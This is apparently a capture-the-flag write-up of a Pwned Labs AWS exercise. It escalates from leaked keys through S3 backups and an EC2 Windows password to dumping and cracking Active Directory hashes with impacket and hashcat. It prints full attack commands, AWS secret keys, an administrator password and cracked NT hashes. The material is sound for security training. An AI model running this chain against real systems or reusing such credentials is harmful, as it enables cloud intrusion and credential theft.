11 minutes
Pwned Labs - Leverage Insecure Storage and Backups for Profit
Leverage Insecure Storage and Backups for Profit
Scenario
Your team stumbled upon AWS credentials on a compromised IT workstation. Your mission now is to use these credentials to probe Huge Logistics’ cloud infrastructure. Dive in, seek out sensitive data, and identify accessible critical resources to determine the potential extent of exposure.
Learning Outcomes
- IAM and S3 bucket policy enumeration
- Obtaining the Windows administrator password from a launch key
- PowerShell installation and configuration on Linux and Windows
- Extracting password hashes from a local NTDS.dit
- Cracking NT hashes
- An understanding on how this could have been prevented
Real World Context
Exposed backups and images on file shares and buckets is common vector with both on-premise and cloud infrastructure. Backups often contain a wealth of sensitive data, including user credentials, databases, configuration files, and more. Gaining access to a backup can provide an attacker with the same level of data access as compromising the primary system. Once an attacker has credentials or other sensitive data from a backup, they can use this information to move laterally and vertically within a network or cloud environment. Sensitive data is often publicly leaked on cloud storage. We can search for sensitive files using the GreyhatWarfare service.
Entry Point
Access Key: AKIAWHEOTHRFRH64EQRI
Secret Key: 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
Attack
We have credentials, so the first thing to do is configure our AWS CLI client and see if they are valid and for which account. We have the Account Number and can see that this account is associated with a user account called contractor.
❯ aws --profile pentester configure
AWS Access Key ID [None]: AKIAWHEOTHRFRH64EQRI
AWS Secret Access Key [None]: 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
Default region name [None]: us-east-1
Default output format [None]:
❯ aws --profile pentester sts get-caller-identity
{
"UserId": "AIDAWHEOTHRFTEMEHGPPY",
"Account": "427648302155",
"Arn": "arn:aws:iam::427648302155:user/contractor"
}
We first see if there are any attached user policies to the account and we can see that there are two, Policy and AWSCompromisedKeyQuarantineV2. We don’t have permissions to the AWSCompromisedKeyQuarantineV2 policy, but we do have access to the other.
❯ aws --profile pentester iam list-attached-user-policies --user-name contractor
{
"AttachedPolicies": [
{
"PolicyName": "Policy",
"PolicyArn": "arn:aws:iam::427648302155:policy/Policy"
},
{
"PolicyName": "AWSCompromisedKeyQuarantineV2",
"PolicyArn": "arn:aws:iam::aws:policy/AWSCompromisedKeyQuarantineV2"
}
]
}
We list out the details of the Policy and see that this is Version 4 which we will further enumerate
❯ aws --profile pentester iam get-policy --policy-arn arn:aws:iam::427648302155:policy/Policy
{
"Policy": {
"PolicyName": "Policy",
"PolicyId": "ANPAWHEOTHRFXRFIVBEXM",
"Arn": "arn:aws:iam::427648302155:policy/Policy",
"Path": "/",
"DefaultVersionId": "v4",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"CreateDate": "2023-07-27T17:39:55+00:00",
"UpdateDate": "2023-07-28T14:24:22+00:00",
"Tags": []
}
}
We retrieve the details of the policy.
❯ aws --profile pentester iam get-policy-version --policy-arn arn:aws:iam::427648302155:policy/Policy --version-id v4
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": "ec2:DescribeInstances",
"Resource": "*"
},
{
"Sid": "VisualEditor1",
"Effect": "Allow",
"Action": "ec2:GetPasswordData",
"Resource": "arn:aws:ec2:us-east-1:427648302155:instance/i-04cc1c2c7ec1af1b5"
},
{
"Sid": "VisualEditor2",
"Effect": "Allow",
"Action": [
"iam:GetPolicyVersion",
"iam:GetPolicy",
"iam:GetUserPolicy",
"iam:ListAttachedUserPolicies",
"s3:GetBucketPolicy"
],
"Resource": [
"arn:aws:iam::427648302155:user/contractor",
"arn:aws:iam::427648302155:policy/Policy",
"arn:aws:s3:::hl-it-admin"
]
}
]
},
"VersionId": "v4",
"IsDefaultVersion": true,
"CreateDate": "2023-07-28T14:24:22+00:00"
}
}
There is some interesting information and in summary the above policy:
- Allows describing instances (
ec2:DescribeInstances) for all resources. - Allows getting password data (
ec2:GetPasswordData) for a specific instance (arn:aws:ec2:us-east-1:427648302155:instance/i-04cc1c2c7ec1af1b5). - Allows multiple IAM actions (
iam:GetPolicyVersion,iam:GetPolicy,iam:GetUserPolicy,iam:ListAttachedUserPolicies). - Allows getting S3 bucket policy (
arn:aws:s3:::hl-it-admin).
Let’s start with looking at the bucket policy.
❯ aws --profile pentester s3api get-bucket-policy --bucket hl-it-admin
{
"Policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::427648302155:user/contractor\"},\"Action\":\"s3:GetObject\",\"Resource\":\"arn:aws:s3:::hl-it-admin/ssh_keys/ssh_keys_backup.zip\"}]}"
}
Whilst the above is readable, we will make the output cleaner by parsing it to jq and we can see that we have access to ssh_keys_backup.zip
❯ aws --profile pentester s3api get-bucket-policy --bucket hl-it-admin | jq -r '.Policy | fromjson'
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::427648302155:user/contractor"
},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::hl-it-admin/ssh_keys/ssh_keys_backup.zip"
}
]
}
With this information, we shall download the zip file and then list the contents which shows that there are several key pairs
❯ aws --profile pentester s3 cp s3://hl-it-admin/ssh_keys/ssh_keys_backup.zip .
download: s3://hl-it-admin/ssh_keys/ssh_keys_backup.zip to ./ssh_keys_backup.zip
❯ unzip -l ssh_keys_backup.zip
Archive: ssh_keys_backup.zip
Length Date Time Name
--------- ---------- ----- ----
2590 2023-07-27 18:31 audit.pem
2602 2023-07-27 18:31 contractor.pem
2062 2023-07-27 18:31 contractor.ppk
2602 2023-07-27 18:31 iam-audit.pem
1678 2023-07-27 18:32 it-admin.pem
1678 2023-07-27 18:32 jenkins.pem
2602 2023-07-27 18:32 octopus-deploy.pem
2590 2023-07-27 18:32 sunita-adm.pem
1679 2023-07-27 18:32 viewer-dev.pem
1428 2023-07-27 18:32 viewer-dev.ppk
--------- -------
21511 10 files
So we have a list of keys for some high privileged accounts, but we need to find out where we can leverage those. You will recall that our account has ability to DescribeInstances on EC2 as well as GetPasswordData for a defined EC2 instance which we will explore further.
❯ aws --profile pentester ec2 describe-instances --instance-ids i-04cc1c2c7ec1af1b5
{
"Reservations": [
{
"Groups": [],
"Instances": [
{
"AmiLaunchIndex": 0,
"ImageId": "ami-0ae60b1f2a289b01e",
"InstanceId": "i-04cc1c2c7ec1af1b5",
"InstanceType": "t2.micro",
"KeyName": "it-admin",
"LaunchTime": "2023-07-27T18:13:47+00:00",
"Monitoring": {
"State": "disabled"
},
"Placement": {
"AvailabilityZone": "us-east-1b",
"GroupName": "",
"Tenancy": "default"
},
"Platform": "windows",
"PrivateDnsName": "ip-172-31-93-149.ec2.internal",
"PrivateIpAddress": "172.31.93.149",
"ProductCodes": [],
"PublicDnsName": "ec2-44-204-191-38.compute-1.amazonaws.com",
"PublicIpAddress": "44.204.191.38",
"State": {
"Code": 16,
"Name": "running"
},
"StateTransitionReason": "",
"SubnetId": "subnet-02700fc3bdb2a97ac",
"VpcId": "vpc-088b21ff238e2caed",
"Architecture": "x86_64",
"BlockDeviceMappings": [
{
"DeviceName": "/dev/sda1",
"Ebs": {
"AttachTime": "2023-07-27T18:13:48+00:00",
"DeleteOnTermination": true,
"Status": "attached",
"VolumeId": "vol-07411201581e71552"
}
}
],
"ClientToken": "04674e37-22e8-44b8-afff-94f5e36a4356",
"EbsOptimized": false,
"EnaSupport": true,
"Hypervisor": "xen",
"NetworkInterfaces": [
{
"Association": {
"IpOwnerId": "amazon",
"PublicDnsName": "ec2-44-204-191-38.compute-1.amazonaws.com",
"PublicIp": "44.204.191.38"
},
"Attachment": {
"AttachTime": "2023-07-27T18:13:47+00:00",
"AttachmentId": "eni-attach-039c3eace03c5924e",
"DeleteOnTermination": true,
"DeviceIndex": 0,
"Status": "attached",
"NetworkCardIndex": 0
},
"Description": "",
"Groups": [
{
"GroupName": "launch-wizard-19",
"GroupId": "sg-0ae31edc4377d337b"
}
],
"Ipv6Addresses": [],
"MacAddress": "12:7b:11:42:a4:0d",
"NetworkInterfaceId": "eni-070802f93fd899fe9",
"OwnerId": "427648302155",
"PrivateDnsName": "ip-172-31-93-149.ec2.internal",
"PrivateIpAddress": "172.31.93.149",
"PrivateIpAddresses": [
{
"Association": {
"IpOwnerId": "amazon",
"PublicDnsName": "ec2-44-204-191-38.compute-1.amazonaws.com",
"PublicIp": "44.204.191.38"
},
"Primary": true,
"PrivateDnsName": "ip-172-31-93-149.ec2.internal",
"PrivateIpAddress": "172.31.93.149"
}
],
"SourceDestCheck": true,
"Status": "in-use",
"SubnetId": "subnet-02700fc3bdb2a97ac",
"VpcId": "vpc-088b21ff238e2caed",
"InterfaceType": "interface"
}
],
"RootDeviceName": "/dev/sda1",
"RootDeviceType": "ebs",
"SecurityGroups": [
{
"GroupName": "launch-wizard-19",
"GroupId": "sg-0ae31edc4377d337b"
}
],
"SourceDestCheck": true,
"Tags": [
{
"Key": "Name",
"Value": "Backup"
}
],
"VirtualizationType": "hvm",
"CpuOptions": {
"CoreCount": 1,
"ThreadsPerCore": 1
},
"CapacityReservationSpecification": {
"CapacityReservationPreference": "open"
},
"HibernationOptions": {
"Configured": false
},
"MetadataOptions": {
"State": "applied",
"HttpTokens": "optional",
"HttpPutResponseHopLimit": 1,
"HttpEndpoint": "enabled",
"HttpProtocolIpv6": "disabled",
"InstanceMetadataTags": "disabled"
},
"EnclaveOptions": {
"Enabled": false
},
"PlatformDetails": "Windows",
"UsageOperation": "RunInstances:0002",
"UsageOperationUpdateTime": "2023-07-27T18:13:47+00:00",
"PrivateDnsNameOptions": {
"HostnameType": "ip-name",
"EnableResourceNameDnsARecord": true,
"EnableResourceNameDnsAAAARecord": false
},
"MaintenanceOptions": {
"AutoRecovery": "default"
},
"CurrentInstanceBootMode": "legacy-bios"
}
],
"OwnerId": "427648302155",
"ReservationId": "r-005e5ae930185ce9f"
}
]
}
There is a LOT of information above and whilst we could filter this for the key information that we need via the AWS CLI, I personally find it easier to do it via jq to extract key information that we need to move forward.
❯ aws --profile pentester ec2 describe-instances --instance-ids i-04cc1c2c7ec1af1b5 | jq -r '.Reservations[].Instances[] | {InstanceId, InstanceType, KeyName, LaunchTime, PrivateIpAddress, PublicIpAddress, PublicDnsName, PlatformDetails, State: .State.Name, AvailabilityZone: .Placement.AvailabilityZone, SubnetId, VpcId, SecurityGroups, Tags}'
{
"InstanceId": "i-04cc1c2c7ec1af1b5",
"InstanceType": "t2.micro",
"KeyName": "it-admin",
"LaunchTime": "2023-07-27T18:13:47+00:00",
"PrivateIpAddress": "172.31.93.149",
"PublicIpAddress": "44.204.191.38",
"PublicDnsName": "ec2-44-204-191-38.compute-1.amazonaws.com",
"PlatformDetails": "Windows",
"State": "running",
"AvailabilityZone": "us-east-1b",
"SubnetId": "subnet-02700fc3bdb2a97ac",
"VpcId": "vpc-088b21ff238e2caed",
"SecurityGroups": [
{
"GroupName": "launch-wizard-19",
"GroupId": "sg-0ae31edc4377d337b"
}
],
"Tags": [
{
"Key": "Name",
"Value": "Backup"
}
]
}
We can see that this was launched using the it-admin SSH Key (which we have) as well as the public IP and DNS name and that it is running Windows. Our assumption is that this is running either SSH, RDP or WinRM so we will run masscan against the target and have confirmed that Port 5985 (WinRM) is open
sudo masscan -p- -e tun0 --rate=10000 44.204.191.38
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2024-07-03 03:57:58 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 5985/tcp on 44.204.191.38
rate: 0.00-kpps, 100.00% done
We then retrieve the password
❯ aws --profile pentester ec2 get-password-data --instance-id i-04cc1c2c7ec1af1b5 --priv-launch-key it-admin.pem
{
"InstanceId": "i-04cc1c2c7ec1af1b5",
"PasswordData": "UZ$abRnO!bPj@KQk%BSEaB*IO%reJIX!",
"Timestamp": "2023-07-27T22:39:26+00:00"
}
If the private key isn’t specified nor in the path of where the command is executed from you will get encrypted Password Data
As we have WinRM open and we know the password we can use evil-winrm to connect which unfortunately didn’t work as there must be additional security measures in place.
❯ evil-winrm -i 44.204.191.38 -u Administrator -p 'UZ$abRnO!bPj@KQk%BSEaB*IO%reJIX!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS The term 'Invoke-Expression' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again. + CategoryInfo
: ObjectNotFound: (Invoke-Expression:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException>
Time for Plan B, we shall use Powershell. Whilst I appreciate that Linux has PowerShell, it is best to just run this from a Windows box and I connect to one via RDP and execute the commands from there as it is less headache and stress using the command xfreerdp /u:username /p:password /v:1.2.3.4 /dynamic-resolution /drive:home/,. +clipboard which gives me access to the Home drive on my computer as well as clipboard access.
PS C:\ > $password = ConvertTo-SecureString -AsPlainText -Force -String 'UZ$abRnO!bPj@KQk%BSEaB*IO%reJIX!'
PS C:\ > $credential = New-Object System.Management.Automation.PSCredential "Administrator",$password
PS C:\ > Enter-PSSession -ComputerName 44.204.191.38 -Credential $credential
We got an error and had to do some troubleshooting and ended up doing the following
PS C:\ > winrm quickconfig
WinRM is not set up to receive requests on this machine.
The following changes must be made:
Start the WinRM service.
Set the WinRM service type to delayed auto start.
Make these changes [y/n]? y
WinRM has been updated to receive requests.
WinRM service type changed successfully.
WinRM service started.
WSManFault
Message
ProviderFault
WSManFault
Message = WinRM firewall exception will not work since one of the network connection types on this machine is set to Public. Change the network connection type to either Domain or Private and try again.
Error number: -2144108183 0x80338169
WinRM firewall exception will not work since one of the network connection types on this machine is set to Public. Change the network connection type to either Domain or Private and try again.
PS C:\ > Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*"
>>
WinRM Security Configuration.
This command modifies the TrustedHosts list for the WinRM client. The computers in the TrustedHosts list might not be authenticated. The client might send credential information to these
computers. Are you sure that you want to modify this list?
[Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y
After this we are able to connect
PS C:\ > Enter-PSSession -ComputerName 44.204.191.38 -Credential $credential
[44.204.191.38]: PS>whoami
winrm virtual users\winrm va_115_veeamprox02_administrator
[44.204.191.38]: PS>
We aren’t able to run basic commands such as ls or dir without getting an error message, so we ran get-command which gave us the subset of commands that we have to work with.
[44.204.191.38]: PS>get-command
CommandType Name Version Source
----------- ---- ------- ------
Function Clear-Host
Function Exit-PSSession
Function Get-Command
Function Get-FormatData
Function Get-Help
Function Measure-Object
Function Out-Default
Function Select-Object
Cmdlet Get-ChildItem 3.0.0.0 Microsoft.PowerShell.Management
Cmdlet Get-Content 3.0.0.0 Microsoft.PowerShell.Management
Cmdlet Get-Process 3.0.0.0 Microsoft.PowerShell.Management
Cmdlet Get-Service 3.0.0.0 Microsoft.PowerShell.Management
There is not much in the default Administrators account, but there is another account called admin that does contain a .aws directory and we have found another set of keys that we can use.
[44.204.191.38]: PS>get-childitem c:\users\admin -force
Directory: C:\users\admin
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/28/2023 11:38 AM .aws
d-r--- 7/28/2023 11:35 AM 3D Objects
d--h-- 11/14/2018 4:17 PM AppData
d--hsl 7/28/2023 11:35 AM Application Data
d-r--- 7/28/2023 11:35 AM Contacts
d--hsl 7/28/2023 11:35 AM Cookies
d-r--- 7/28/2023 11:35 AM Desktop
< --- snip --- >
[44.204.191.38]: PS>get-content c:\users\admin\.aws\credentials
[default]
aws_access_key_id = AKIAWHEOTHRFT5Q4524N
aws_secret_access_key = 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
With these credentials, we can finally return back to Linux and we will update our configuration and verify the keys and see that we are it-admin
❯ aws --profile admin configure
AWS Access Key ID [None]: AKIAWHEOTHRFT5Q4524N
AWS Secret Access Key [None]: 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
Default region name [None]: us-east-1
Default output format [None]:
~/Hacking/PwnedLabs/LeverageInsecureStorageBackups 20s 12:58:58
❯ aws --profile admin sts get-caller-identity
{
"UserId": "AIDAWHEOTHRFWB4TQKI2X",
"Account": "427648302155",
"Arn": "arn:aws:iam::427648302155:user/it-admin"
}
We go back and look at the S3 bucket from earlier and we can see an ntds.dit file which is an Active Directory Database and we shall definitely download that and extract the hashes
❯ aws --profile admin s3 ls s3://hl-it-admin --recursive
2023-07-28 20:35:38 0 backup-2807/
2023-07-28 23:52:58 33554432 backup-2807/ad_backup/Active Directory/ntds.dit
2023-07-28 23:53:07 16384 backup-2807/ad_backup/Active Directory/ntds.jfm
2023-07-28 23:53:06 65536 backup-2807/ad_backup/registry/SECURITY
2023-07-28 23:52:58 17825792 backup-2807/ad_backup/registry/SYSTEM
2023-07-27 23:51:45 99 contractor_accessKeys.csv
2023-07-28 19:50:49 0 docs/
2023-07-28 19:51:07 10591957 docs/veeam_backup_12_agent_management_guide.pdf
2023-07-28 19:51:09 9408343 docs/veeam_backup_12_cloud_administrator_guide.pdf
2023-07-28 19:47:07 32 flag.txt
2023-07-27 23:53:06 0 installer/
2023-07-28 05:02:47 1579290624 installer/Veeam.iso
2023-07-28 01:34:24 0 ssh_keys/
2023-07-28 21:48:18 17483 ssh_keys/ssh_keys_backup.zip
We shall download the backup-2807 folder to our local machine
❯ aws --profile admin s3 cp s3://hl-it-admin/backup-2807 . --recursive
download: s3://hl-it-admin/backup-2807/ad_backup/Active Directory/ntds.jfm to ad_backup/Active Directory/ntds.jfm
download: s3://hl-it-admin/backup-2807/ad_backup/registry/SECURITY to ad_backup/registry/SECURITY
download: s3://hl-it-admin/backup-2807/ad_backup/registry/SYSTEM to ad_backup/registry/SYSTEM
download: s3://hl-it-admin/backup-2807/ad_backup/Active Directory/ntds.dit to ad_backup/Active Directory/ntds.dit
We have used impacket-secretsdump and have dumped all the hashes
❯ impacket-secretsdump -ntds ad_backup/Active\ Directory/ntds.dit -system ad_backup/registry/SYSTEM local
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x8e47e7e457e33035cfabaea711975407
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 6df8fdd3a446ef9ed1a64c6a03a28ce2
[*] Reading and decrypting hashes from ad_backup/Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC04$:1003:aad3b435b51404eeaad3b435b51404ee:fc15058af730b1de899a7aa6759e894c:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fb22f21bc86dfe7b0073d9f9f722ae0e:::
huge-logistics.local\leandra.joice:1232:aad3b435b51404eeaad3b435b51404ee:84cfc9ded98b57bcc517375c5911ca2c:::
huge-logistics.local\leigh.simone:1233:aad3b435b51404eeaad3b435b51404ee:ad32cc080b0aeb6531200bdaef08adb6:::
huge-logistics.local\hilliary.kim:1234:aad3b435b51404eeaad3b435b51404ee:52edd5f46cf02573d5e2392c67fa0183:::
huge-logistics.local\melanie.ashlie:1235:aad3b435b51404eeaad3b435b51404ee:58f507bbf45e920e5f3af9ea39bf8407:::
< -- snip -- >
We will clean this up and then pass it into a file for cracking the hashes. With all the hashes in VIM, removed the unnecessary lines at the top and then Visually Selected all the lines, and in command mode enter awk -F ":" '{print $4}' and this returns all the values at which point we write this out to a file.
Using hashcat with the command hashcat -m 1000 hashes /usr/share/wordlist/rockyou.txt we got the following passwords
c52abb1e14677d7ea228fcc1171ed7b7:daniel
89c99393bfe3c0a95deba6dcb0b12b43:123abc
a4a02c448197f67cd9e982a5e5d0acc3:rabbit
1674049edd3d39cead200b0fee90982a:knight
89492d216d0a212f8ed54fc5ac9d340b:qazwsxedc
4d4df769e6b9b338fabda5846cf85792:<redacted>
31d6cfe0d16ae931b73c59d7e0c089c0:
58a478135a93ac3bf058a5ea0e8fdb71:Password123
We got a little creative and then decided to match the usernames with the passwords
❯ while IFS=':' read -r key password; do grep -F "$key" hashdump | sed "s/$key/$key:$password/"; done < cracked_passwords
huge-logistics.local\rebeca.juliette:1359:aad3b435b51404eeaad3b435b51404ee:c52abb1e14677d7ea228fcc1171ed7b7:daniel:::
mssql_svc:1362:aad3b435b51404eeaad3b435b51404ee:89c99393bfe3c0a95deba6dcb0b12b43:123abc:::
huge-logistics.local\blair.rosabella:1358:aad3b435b51404eeaad3b435b51404ee:a4a02c448197f67cd9e982a5e5d0acc3:rabbit:::
huge-logistics.local\ketty.carma:1261:aad3b435b51404eeaad3b435b51404ee:1674049edd3d39cead200b0fee90982a:knight:::
huge-logistics.local\lanette.kiele:1278:aad3b435b51404eeaad3b435b51404ee:89492d216d0a212f8ed54fc5ac9d340b:qazwsxedc:::
huge-logistics.local\hali.lombard:1238:aad3b435b51404eeaad3b435b51404ee:4d4df769e6b9b338fabda5846cf85792:<redacted>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:Password123:::
PWNED!